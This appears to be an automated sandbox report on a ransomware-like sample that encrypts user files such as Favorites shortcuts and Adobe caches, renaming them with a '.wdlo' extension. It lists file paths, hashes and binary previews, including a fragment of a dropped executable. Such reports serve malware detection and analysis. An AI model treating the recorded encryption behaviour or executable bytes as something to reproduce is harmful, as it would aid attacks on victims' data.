Preview:	[{000.IW,.'\|-#q..&0.H....O#.4.)<w..$...6jh,}..h..Te5......E..h...r..i....:,.&5..... $....@.R.....UP.5r. ..9nE^...b..M.m......<.....^1%..:pt.y...j....P..5....t.......35a.Pw\|/.ts...w_.p...bs.U~.1;.4&......Y...K...."..Xi.:..........Oi{..."..X.`1.Ro........L....K.\}...w..t...........h...(..)...D..]!S.?0.8..x.jY.,.8{Kc'...&]g.-v.j(7&<....(E..@*..9;$.xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\NYTimes.url.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.462765827506934
Encrypted:	false
SSDEEP:	12:tmDPL0dzOB1NEUIT+EvUf3sZvLTnj0v0KogDj6Z3cii9a:thO2U3ES34vnj0vS6WFbD
MD5:	244ED3AEC8A2E216F212091B78BD17D8
SHA1:	66785FD821BF8A2B27BECA7574118E72CEECA850
SHA-256:	DD1031FF6A3CA0A51EDEDC0A33212171EFC203D909683E53D2ED3C804701DEF3
SHA-512:	12327338E9E8DB421FEF97CDCEC2F8F27EED4625D2B5EEF86B991A74192391BBA264DFA9C0C6AACDC0857F4CC09BC4CDE27263A6FE794C475860A9A15E5E0144
Malicious:	false
Reputation:	unknown
Preview:	[{000.IW,.'\|-#q..&0.H....O#.4.)<w..$...6jh,}..h..Te5......E..h...r..i....:,.&5..... $....@.R.....UP.5r. ..9nE^...b..M.m......<.....^1%..:pt.y...j....P..5....t.......35a.Pw\|/.ts...w_.p...bs.U~.1;.4&......Y...K...."..Xi.:..........Oi{..."..X.`1.Ro........L....K.\}...w..t...........h...(..)...D..]!S.?0.8..x.jY.,.8{Kc'...&]g.-v.j(7&<....(E..@*..9;$.xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Reddit.url

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.438788993747058
Encrypted:	false
SSDEEP:	12:UUbe9oJYW60BE9AgI+PhE4wh5vDj6Z3cii9a:/HlsTUh5rWFbD
MD5:	E3253B6A59F01345BF485C9A7EB457AE
SHA1:	55A5811CEEE1945069F8196BB7DF6244B7EA0DFF
SHA-256:	43206A695C1B90B33AC0C391B551CADFFA796A69E3BBC609037452FE60CB1BFD
SHA-512:	7AEBA67D0A75758C24BCFECE998277A68F61EF647C538B9D405D3339AA0D5052F75B94F2906113553DDE544E484D96C11924B6464366B8976ABA56339D97E1C2
Malicious:	false
Reputation:	unknown
Preview:	[{000.bB...xZ[..#g..../...O.\....`?.0....l.bk...-..K_.......'.^}..;^.......b.K...R.<8........[.cB...}.Ph.1@....^..t..3.;.S2.u?..... ._......Y.....=......w.L...?".#...0........?.Cq/.....>.o...i.{J.K.#..T....N..P..w.;)..\7..B...2;.....3..V.\d.x...o..pz..R2x.g!.;C.....s.&.&.......Q.).H....<......m......... H..y.s.dG..a.A.->C......Yr.V.......p..u3'._.1xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Reddit.url.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.438788993747058
Encrypted:	false
SSDEEP:	12:UUbe9oJYW60BE9AgI+PhE4wh5vDj6Z3cii9a:/HlsTUh5rWFbD
MD5:	E3253B6A59F01345BF485C9A7EB457AE
SHA1:	55A5811CEEE1945069F8196BB7DF6244B7EA0DFF
SHA-256:	43206A695C1B90B33AC0C391B551CADFFA796A69E3BBC609037452FE60CB1BFD
SHA-512:	7AEBA67D0A75758C24BCFECE998277A68F61EF647C538B9D405D3339AA0D5052F75B94F2906113553DDE544E484D96C11924B6464366B8976ABA56339D97E1C2
Malicious:	false
Reputation:	unknown
Preview:	[{000.bB...xZ[..#g..../...O.\....`?.0....l.bk...-..K_.......'.^}..;^.......b.K...R.<8........[.cB...}.Ph.1@....^..t..3.;.S2.u?..... ._......Y.....=......w.L...?".#...0........?.Cq/.....>.o...i.{J.K.#..T....N..P..w.;)..\7..B...2;.....3..V.\d.x...o..pz..R2x.g!.;C.....s.&.&.......Q.).H....<......m......... H..y.s.dG..a.A.->C......Yr.V.......p..u3'._.1xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Twitter.url

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.3840586457855
Encrypted:	false
SSDEEP:	12:DSiLFuhZudUcxhyBX2q4qp8Hi4C15KLwrB4lwhuRekJHDj6Z3cii9a:uiLFufYX4X54qoiRoajQReWWFbD
MD5:	13E6E0542ECF959CAAABF008CC064209
SHA1:	DA9AB323F73010077EE6D15B0030C8CAA2143A58
SHA-256:	0115657A4B330CC78F67E3FFD561F97B648456993E70A1B2FF055FE4895169CD
SHA-512:	F02E26F5C49414E27E0AB761AD8939E056C10A778AC0EB41256ADB1F06BB011D969CBDC27BBC3E8C2C95E8B87D98EF606A04C95FE051388675FB40BC59641859
Malicious:	false
Reputation:	unknown
Preview:	[{000.G.Hj...$.G5@!..)..3r`o.K.}..(.YG.n.E2&.....}rF!...`.$^$\|`....F...(..ZN.9.....g.....~..4@M83.1r.#w.IV\|r.w....'.....'.j.....8?RN@.vI.OGI......`/...8r....K..^..?$#.4.....FL...R...bFG...}..va..bR....m..0;Ne.....]Z...g.eQ.8;V>.$6..........:..Bb.]...P.w'.<....iqU....2..l$.7g.W..S...j.....7.E..E..........(.6O.h..).F......y.-.y..8......!E`]~}....^-..[?xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Twitter.url.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.3840586457855
Encrypted:	false
SSDEEP:	12:DSiLFuhZudUcxhyBX2q4qp8Hi4C15KLwrB4lwhuRekJHDj6Z3cii9a:uiLFufYX4X54qoiRoajQReWWFbD
MD5:	13E6E0542ECF959CAAABF008CC064209
SHA1:	DA9AB323F73010077EE6D15B0030C8CAA2143A58
SHA-256:	0115657A4B330CC78F67E3FFD561F97B648456993E70A1B2FF055FE4895169CD
SHA-512:	F02E26F5C49414E27E0AB761AD8939E056C10A778AC0EB41256ADB1F06BB011D969CBDC27BBC3E8C2C95E8B87D98EF606A04C95FE051388675FB40BC59641859
Malicious:	false
Reputation:	unknown
Preview:	[{000.G.Hj...$.G5@!..)..3r`o.K.}..(.YG.n.E2&.....}rF!...`.$^$\|`....F...(..ZN.9.....g.....~..4@M83.1r.#w.IV\|r.w....'.....'.j.....8?RN@.vI.OGI......`/...8r....K..^..?$#.4.....FL...R...bFG...}..va..bR....m..0;Ne.....]Z...g.eQ.8;V>.$6..........:..Bb.]...P.w'.<....iqU....2..l$.7g.W..S...j.....7.E..E..........(.6O.h..).F......y.-.y..8......!E`]~}....^-..[?xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Wikipedia.url

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	448
Entropy (8bit):	7.4744681324076545
Encrypted:	false
SSDEEP:	12:fFObf9xh+naa5nzYFl8u2pijLKH1HDj6Z3cii9a:fM7AntYUu+ij4jWFbD
MD5:	E5A818127D75E2451AC6F0D9A65328D1
SHA1:	248F8CA3E7E1AF4F33910796FD23CC1CFF770EEB
SHA-256:	9F81FC114C530B490D55A4985E0816126E57F0B754DDD6D4AD3AF4B438D8105C
SHA-512:	B6E1D37896D18708EEA31C2049ED1BEDAE2995206CC78B79519FEAAB2092D80DE8C1CB063E8953953CF5609F6A8BA57F1FF7CB741AF7640EE0357D3B4650B001
Malicious:	false
Reputation:	unknown
Preview:	[{000<[.Q....D...m. .W..$c..0..lbf:.E..'..=M...).1Kf.+.\|t_~..C..#.Eh..z9...Z..f...0N..._;.?._..........[...~/.x..{...T....1ni...l.C;...k....p;.3.Y......XV6..gB].......X...2I.B...[[.._.T7.n........4rx&..Z..2>..S....g...w.T.hB........b......-4...[bi......m.D.8dO.....>.A.I........a.n..X.#.!..gN.....%.z.4......B)...i&.l.=#.rU:+......G=..Z.*X.A...xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Wikipedia.url.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	448
Entropy (8bit):	7.4744681324076545
Encrypted:	false
SSDEEP:	12:fFObf9xh+naa5nzYFl8u2pijLKH1HDj6Z3cii9a:fM7AntYUu+ij4jWFbD
MD5:	E5A818127D75E2451AC6F0D9A65328D1
SHA1:	248F8CA3E7E1AF4F33910796FD23CC1CFF770EEB
SHA-256:	9F81FC114C530B490D55A4985E0816126E57F0B754DDD6D4AD3AF4B438D8105C
SHA-512:	B6E1D37896D18708EEA31C2049ED1BEDAE2995206CC78B79519FEAAB2092D80DE8C1CB063E8953953CF5609F6A8BA57F1FF7CB741AF7640EE0357D3B4650B001
Malicious:	false
Reputation:	unknown
Preview:	[{000<[.Q....D...m. .W..$c..0..lbf:.E..'..=M...).1Kf.+.\|t_~..C..#.Eh..z9...Z..f...0N..._;.?._..........[...~/.x..{...T....1ni...l.C;...k....p;.3.Y......XV6..gB].......X...2I.B...[[.._.T7.n........4rx&..Z..2>..S....g...w.T.hB........b......-4...[bi......m.D.8dO.....>.A.I........a.n..X.#.!..gN.....%.z.4......B)...i&.l.=#.rU:+......G=..Z.*X.A...xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Youtube.url

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.468348921490119
Encrypted:	false
SSDEEP:	12:3abZ7Yo5DptmFv6x8fq5vHUxGFMNnDj6Z3cii9a:qbiMtYFv66yHUmMNDWFbD
MD5:	64F5D1417E9DE225B95E9876279D3914
SHA1:	24AD592288B56ACAAF0C0315657962E09FFF0F2C
SHA-256:	0E44F086293C6F882AB7B6E8BF2928CD671208620AE68F8A4C35CA5424BE8BAF
SHA-512:	1B6C02A24D805354E7E8B5D3A7807CFBD5B59EE5842B57EED09CD3E7B47BCF89C45D4438681037493F01BC39F44DF69947F8688EB60E3FCC0DC7B3D6C1E9A1BB
Malicious:	false
Reputation:	unknown
Preview:	[{000MO....+..n.....s.B..@.^...9.;.......oq...E.;e~.W51n^..>@.g....e...,..+.J..r7.)...^.?R.@S%.9+...C..v......k..........zn0F...w.o?.e>\|...;...{...2...f.s~..v.....&....LRQ...4.......P.RKq..Db.pSg.]..4...b._o.(g.......'.2..^.:........Q...Zu.F..}...5..r..p&....[..M.....5k.9..m..s..L....8W..K....v.......84y..X.*.......x/..v'T._U3.....&@.X..i.6.+xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Youtube.url.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.468348921490119
Encrypted:	false
SSDEEP:	12:3abZ7Yo5DptmFv6x8fq5vHUxGFMNnDj6Z3cii9a:qbiMtYFv66yHUmMNDWFbD
MD5:	64F5D1417E9DE225B95E9876279D3914
SHA1:	24AD592288B56ACAAF0C0315657962E09FFF0F2C
SHA-256:	0E44F086293C6F882AB7B6E8BF2928CD671208620AE68F8A4C35CA5424BE8BAF
SHA-512:	1B6C02A24D805354E7E8B5D3A7807CFBD5B59EE5842B57EED09CD3E7B47BCF89C45D4438681037493F01BC39F44DF69947F8688EB60E3FCC0DC7B3D6C1E9A1BB
Malicious:	false
Reputation:	unknown
Preview:	[{000MO....+..n.....s.B..@.^...9.;.......oq...E.;e~.W51n^..>@.g....e...,..+.J..r7.)...^.?R.@S%.9+...C..v......k..........zn0F...w.o?.e>\|...;...{...2...f.s~..v.....&....LRQ...4.......P.RKq..Db.pSg.]..4...b._o.(g.......'.2..^.:........Q...Zu.F..}...5..r..p&....[..M.....5k.9..m..s..L....8W..K....v.......84y..X.*.......x/..v'T._U3.....&@.X..i.6.+xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeCMapFnt19.lst.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1369
Entropy (8bit):	7.858093262040757
Encrypted:	false
SSDEEP:	24:ljxQLVBj3h3VoOUUrwn/F04lbAXbliy0RKd4vOEO93kAnFpECNIZkZvWFbD:LOTh3VNw/F04tAWRKd4QdVu2ZvWVD
MD5:	A7241C84E910B8B67F1A238EC88E9FB8
SHA1:	D8F125759344495071842FE038F7722071AEC231
SHA-256:	60B9DF627C528280F7E1240E269CC08562D864405594672EB4DF36B317F52969
SHA-512:	2F80FD04F531E2EA7378CBD41941A6BC2D24F6E768B9742673461B044F1BE4AFD4B06FAEFFC3357C00F1223A2E4DB84AE7C1E5FBAB0A8A36B64513DA7CF9F198
Malicious:	false
Reputation:	unknown
Preview:	%!Ado.J...J.j.Z.m.X.+....]....s........6ED.].z..F..:.;].I...^,]r.......>.,.v`.4..;/.....B...`...^.....lp,hc.....t..L..a.M..JNSy#..k.m..)SK........D...S....X.lg...US.4-.&.@..6...N.e'..e..4./.....p0+.@O.:p...v._.C...t@.>...9.............T..l.....H.._...{.T.....@.qN.......\|9....0ym..q..b.4.'......z....@..#.N..b.f.\|r.UCgg.\!.O%..h..Q/..I@&..Fo.%.W...j..*B...V.kd9e..G..h...v4..p...(?.c0Yf..KE.N.U....1..a.G+.m....Hmym..ZU.U..u...Ejl..^.G.<5._................6..8..@s.T..V.-...fr.......m~h......,.... ...%d..........kz...j.{...g@.......]..8;6)..V..:...wU..=..o......\|.=.`C..)..n..."..#......z..X..Y....g.ip..b..1#v .h..m8........o..z.(.(.. u.1.......GT/.BT.....9..@i.d2f..U.E...p.{..1.h..SX&.............oA._.v$%B]>K..TQ...G..r.......'.zT#LrI..n.8.s.h...[..g..mX..n......A....."....".01o..zY9...K.a.Xi<...J.%...6.A.."....'..M...>J....F.G]tEp:.e2Dc.q...L/.:z..a..M<...=._X...$...\|......t~L.'..^.!.A.e...2.8.........=....L0d.[.....w.V%F....]...t.p.6.

C:\Users\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt19.lst.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	80722
Entropy (8bit):	7.997463079990942
Encrypted:	true
SSDEEP:	1536:O5wmGKq5myQcLMUQCnd2F0lkPpa/DpBSQOqktD9uoTr9DJhpUkhrAorkn:efGKpFcYUbdwukBODLSPqkTu89DjpU08
MD5:	AB5623D85C425D84FB200B2C939354D8
SHA1:	C4D72B281081BCF46F4B4807F81320A42D7F70DA
SHA-256:	D5D733BD03D2736B4A6DC5A0AB6270D5AD71DAA0A0A0E7F8A4EEAB21E9FC6804
SHA-512:	245C9703FBAA541BC0FDD34A848D91D4E24EE4AAAA48E2A5B931FD7C6FEB974A1D4DFD53C118869E38F1DF29FCE27A48D6BB2D7C136ACE94338838641BD540FF
Malicious:	false
Reputation:	unknown
Preview:	%!Ado.5....b..0..d...)B..U.)CF.M..?..S..Tg.......}..s....e."..v.zt...F^x..w...M......,.`t....;r..D....+\|...e"......k.D.>:.-........x!....B.W...#....N..A,(+...M+q.n.-l....9.....dGj8..G...a.!)....~...B.p...p..L..P....2t...Q8 h.'.V.xYC.=q....{y....~....+..j.5..q.....W<.;.%D......Y.....O.X/..Of.&....K.^..f.u.6.33k..:..:...w..H.vC.pg.a."./.u.)8KB5..3..\|.l'-.yr.1.9O..H...p...Z.u0..B....{.'/.l'\....,..3....6....6aD..H..I-...jmhFT.....m.x.H.\|8.3yJ.F.....................&.D..;>.....p..o..S....I..........~~.."#.B....5zL7%..k.....Df`[.?.. .....bwg.B....l......\|...2uh..........#?.....8.....L...v....8T.F.@.5o..Qe.."...myX..K.0p.4q.Q.(.k.:6.#.55.g4.].[.S+.........G...a.........A:.#n.V.M......kO.9.*vv...."...%}.(.Y.HZ..,...w....D.=!,.h@.I....l...F(p........V..".\|.....3../.j...X.H..Pf.{.L6.b.'.........1......Q6.=.8P6..I..........O.......'......U.Z2.M..-Ff....8$.Y.l9.q...'..cI.\|p.Po...Ns..T..Dc.=...y..{.}.y......h...=..Ck...Z.........#Z.

C:\Users\user\Local Settings\Adobe\Acrobat\DC\IconCacheRdr65536.dat.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	203027
Entropy (8bit):	7.2807706945690125
Encrypted:	false
SSDEEP:	3072:pR1rX+kSbDrz7xO+lux3E+yckAafoi6YBeOuT88rF8CP4+Q:pR1rONNO+4vycioiLBeOuT1riV
MD5:	FB7772064BBC37EB2CBCDC2780481495
SHA1:	186F86FCC5498208A84A7387E3578B4643451F95
SHA-256:	47B031347D0FD2E995CA155845050FE04E0FC755426ED1FC2BEF99E7F16D4B54
SHA-512:	10C02EE28975E3AAA7C8B720F81F5EB737349B2CFA07DB4430DB75153F837BC42551D5812B3F836B6F5D55ED2786710B386A92E77CB4E4DCD1F47413DBA9287F
Malicious:	false
Reputation:	unknown
Preview:	Adobe...Z....&.{.Q..i ....VN..l..^L^./..[...^...I....9e[..afT..R.T.O!.(.3.....0.l.<).m..`J .8C....<M.e....%._3&..........^..z.K......+.Ww...B.....=;.l...p....3.!.v......c?<?...CP'g...F..(.-.R].....UR.4.1..Cv.0.g..-.v.g....f....~C#O.!\...{.%..sCd5.h.5...3.\..($...wm.^..}.......<<.c....h..1L......oP........U:4.$(.M$^o....^xm.J...+.R.5..vF[...GDkj.w...........'..6....n.3...M.W^cO>A..K}v.........b5......t.kF.j.f..u8..XB...i.7.i.M.k..&D.g...[FL.O..9.t....!;./...vx..}d..J+........`5.3j.Hb.du...Qt..../,O..Y.q...i.S.c.H.S....maQ.......ds.0...Z<l...5....l.ik...O~.V.T.S.n...j^..R......@.bock....n.......b.1.7R:.....Q.[`.<.t.QD.P...{...7.O..3...eT.L...g...z....e..=-.....k..A....(J....\Mx_xJ......I1..x.l...}rD...R1...G}......9..d.u3.........a.L...g....~......Bl{...S)..R..Fh.d&#.._.[..5........C.HU ....?.......F.?..[W...;I..09 .:).t".f\|.rS.'.......{q.l.x.n.,..Yb.L.M.[%..!.....~....'i.....+0j.T.Z=...Ul........k...L.y.....l.....h.)....K.s.:M.......L......n

C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache.bin.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	32987
Entropy (8bit):	7.994670699145432
Encrypted:	true
SSDEEP:	768:Qgj1yq2nJaNg5Hiq9PQXT3dN9cLLd36zLu/Pvq:7JkH5rPAThcaLUPvq
MD5:	D732185941E36BFE39378714677581AC
SHA1:	AB192CC7D732AEBFD3BD18ABFF7FB6795F2AD332
SHA-256:	BCE8B2EBC94EB1B381B512116A357B828753E001D1ADB3F5A3A19A7E7520323C
SHA-512:	7D8F7C9E644975D185CE5C1D0F20F29FC3A8491C7ABB201C6AC68A9590C06006566ADF922A0C8EC50222CAFE1C2989F9CF3BA51C7A6BE33E2EC220E44B274B6F
Malicious:	false
Reputation:	unknown
Preview:	4.191-O.o.......(...K....-F.B?..>..j.N.6H.E.......q...i..p..._..(.{....Y...D.o.T..L...K.l.......3...Y..a...#..@.et..)...^.j..K.....cqo...b6^0....n.....h..h..K...d"8..k..]...8e.8-.....9.....K.'..(B1mq.....}....>K.,..)@.-.@P..n.g..hce..5.....{.....SrN.%>..V...J..TG<.T....n/.....g..gd..T.....PB..".M...9...Y.jU6g.}E...S)r..,..E...;6.x..XW.?....M..Xe.......J....6..%-...y.z3 ...C...r.C.&=.\|j1...t<.o..&.^..M....C.;F.....{...}_...q^+..B.v5i./..:F.O.b.c....HH...z?\|Q..m.a..].....F`....6.........c..- ..?..a0........~>...@Y}..2.x...JY...P.n^,..'....?.J.......j..\...CWp..`.J.yWk...}.....o......d.j...h..ev&.-._.BB.C...X+Os..P.u.....ci....[L......c..5.......{)+.P.@-"...v......d.O.s........x\......c..R....x\....j..(..e.`.^..5a.'lx..V......JZ.4.}f.i@.....h?...X$._...N..f...Y..Ka.]..2uL..\|.*..q"..^.......z3 .t2.....#... .-..iK.n5.........&1ld.Lt.f.}\(..eJ:....M.}...W>..L....?....6..G.N?....W.\8I.p..}...$]...u....5.....o....0upP....mJ.s3=....(N

C:\Users\user\Local Settings\Adobe\Color\ACECache11.lst.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	932
Entropy (8bit):	7.739736680788289
Encrypted:	false
SSDEEP:	24:CxM9sT0GJl5NLphCtGxAYaQhS4dgbkaIoKvmS7Y0WFbD:Cq+PhLphuRYaKgbMvmSU0WVD
MD5:	726B9C27667BC2A0ABAF9576CEE67689
SHA1:	A70C5BFC038BFA2AC99EC650D6F0EDF91F1D16FA
SHA-256:	A7C26DDF44DC3B66F5D2B5958A9D90E08881E3B050C99DE9D922704EA8962121
SHA-512:	7BDB3A10B9B90E5DEFD452CDD174A54F6236B3FC13D434545F45FB006E2587ADACDB23DEBCBA0DF3FD628AB205FDBA5EA7F4401B8EC93E7D0346627988009908
Malicious:	false
Reputation:	unknown
Preview:	CPSA.>h...iS.N...%..... S..z.^.3.Y~EK;....].e...j...(&~r......vb.S8..}...?..4...Hj....`.L.....Dw.....iO4.;+h...9..N..T.x.....z2S.&8GZ..n.4.... \e..QJ....2.#.b.?NH#..^..j..Jb.".g...B].....CT..C....._.)Fl!.....-.a......)...V...g...F..6.... ..=Q......v..?).Hs..1.j..s{S...........S......'w......1..M.....&....Ex..j.d-9.S..V._9.Li......,...-=...+EH......>..(...!_$.d....f NS......C....._..!... +...i.d ..I.1Og....F{...e......q.i..@t.A,..\|..:.F2....]f..E6F.B%.1..m.O.d.....b/?....$...\|K..].-.Pd..k..r..?..r...a....e.....6.....".(..:N_.g?.......5....).{.....@p...........7./&k~$..O....$b.F ..._..._;..YTa<.6Z[.x....AT.{.RuP\|,.QST..f.....%e...s....:.wS]+].Z*$.....{.s......huz.:........-..I.z...;....rp..()....s.Q.X.F.......pR.......<.7.m..k=5H...M].....g.+...j.{.cGp<L.W2.. ..'.+C].....C..1....HI..p.VxbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Application Data\Application Data\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	632142
Entropy (8bit):	7.88701557280486
Encrypted:	false
SSDEEP:	12288:92eptVZQWeeWpmELOGJivgdrvEY2VBEN7AXlSvpqDFou:gKtHQWyoELiGEFEHvpaFou
MD5:	13964D35B83228B6A13D4911EB0A929C
SHA1:	E0480F1934A9490A0E2ABC2FEFAA6E118787F146
SHA-256:	981AAAD8AEA92A2CC730E3B56F4C1F8AF100E9EAFF7F924DEE009F61FD27B58A
SHA-512:	B3FAE31960DC25A53D4E4773DA603F1F93CC8D84FC15B92FA9B0D6219FE674F9FB74520C160AE0AD6DCC970319051B346725AF98A26087CE9409AB494CC3DC53
Malicious:	false
Reputation:	unknown
Preview:	MZ...AY...'..R. .;}..t.......\..+.......l.m.>.^.U ..:..=,.7.....9.b..A...P72w>.i..l9..xJe...9_9....R... n`.,..n...d.......Thk... .....n...Q(....l..$......E......e/...O...l.....^..c.Z........MY.w._7.J..u8.....J......P/x..e..M..@..q....t4u..!t...#I.B..t.OL......WC.i8.]f....T."o.....$"......(.": T..i....D].#..a./fn......4[..\Wk..[........U7.%=...jga?......)y.Bzh.K.. ..P........^.F..l&..q^.Q..... .N90..A..g.V=......J(B.......:.....ZK.z./~)D.....L.H.O.f.~....'..:.......Q)<........'....#.U..?+...5....K.o......Iz.k.-.......z.)....k..._.a....y....?["%8;\|..".....\|V.>..3..J....G.M9...I.....w..4../..Dt...!..7L. 8.l..w.5I....m1.._#......0.#........9.3Q\?.6o..D.....gr............eR"....E..k.B. W...../z...tclK.^......VQ./.)k...\|%.......kE...=.F.^..!Q..>............\|.].....I...H....wG...43.M.m{..t..1;...(%..&.3W...CZ.K"K....Y7.(Z.D.U....Q..,...3N.>r......h7B.T...O.!.L`.$...k..q....+1.....l...+.....pw{....pR,.^....X.K..<Z&.S..h d..j..YK..'%.`.C.b..

C:\Users\user\Local Settings\Comms\UnistoreDB\USS.jcp.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978700696502978
Encrypted:	false
SSDEEP:	192:liwgj+Lbc1Ll3AH1b3PfrrKCUS38X2HsrMNwYCLM:EwDQR32TPfuGHs+wBLM
MD5:	5263DC321171F3D5339B22B21780CC55
SHA1:	B9B4D1B5E26CAEC235CCA7BD136BE5BE53BF33E9
SHA-256:	E69BA3E2483B987593F730BAC576F1706A63EA4565AF304A27631CC591F0D40C
SHA-512:	6B397F4810B0D5684352B9D188E11930311D2031522770BBE086807862E3D9C465079B1B850601907DC18547E822782677918ED574F2CDEABAE4F8239D94EA30
Malicious:	false
Reputation:	unknown
Preview:	......7H.gZ.#O..z5.F..]K.f......\=......7..2.S..4.....>....k8....'...g.o.....F...........2?~.e.R46..'.&.....{.O. ....N o?(..+...x.+$h4..V..(.yMO...R...bf.....\|p.\....^.-\|.o6...Q..).... .w.$..v#J..Q8}y`...5@...X.k.d.J....'.xd.h.mX.g..4.0..A.\..3._...x..Hg.....{..9.L..564b..0.y.....~G.D.............n..-.u.\|..N...9.0i.... D]....\......aB...gP...h......$U.._......C..5..3..l...6.i..L.;.y.._.0.qXlo.bo....S.^.%t.....v.U..Y.M&...5........A...C.~..Q........P.}.qV.(r.@.......u.`.At..?.Z.'n6F....)....l..Z9Q....&2.(t.:.....Tg.h..C.dn..W.......G.... \|Q..QR..x#8K.i.Rr.>.....\|O......B:..]./.O!L.4...x.v.6..C....*a...Xt)h..95q.u....4E..lp.H.;..7...-.l.$...!...'............z.;......R...6.....3..'t.6,..4..m....>....P+.<c...w;...t.<\|.....E..2.b.+.......Fd...B5....n.U.....S......#y@.@"Ymo!D.W=z......../...E.p.9.uA...FHf....X{@..43....}...P.l,...J..-..[".....F.....>.t..s.N..?..9....%%el1.28..<..x.........>..P...... ..?.\..,.4.Z.\L'.I..

C:\Users\user\Local Settings\Comms\UnistoreDB\USSres00001.jrs.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	3146062
Entropy (8bit):	0.6705733225372122
Encrypted:	false
SSDEEP:	3072:y/yHdDVUImFXa+9lozn+tnniNUOglFhkpQHTgJOtbTIiFs2frN:oY2FFXJI3NjmspwTxo4PfrN
MD5:	6A4E9A2F6E1865DE5ECD89F488B3714B
SHA1:	661A26163E5C16C3D1FE453E84726440145C5C51
SHA-256:	9D3BA0FF58F24EDE62631B0F1F7F0789546AD1C372AA0BBFB9B27B2DBD1E06D1
SHA-512:	07B276AEFC57B6663B7A30085D36712982723719883F3A887BA73C8374C252A424D9606DACE1F87DFF4A1D0E8373B190761B9EA5AAAD014D499B68DEEA3FB2B0
Malicious:	false
Reputation:	unknown
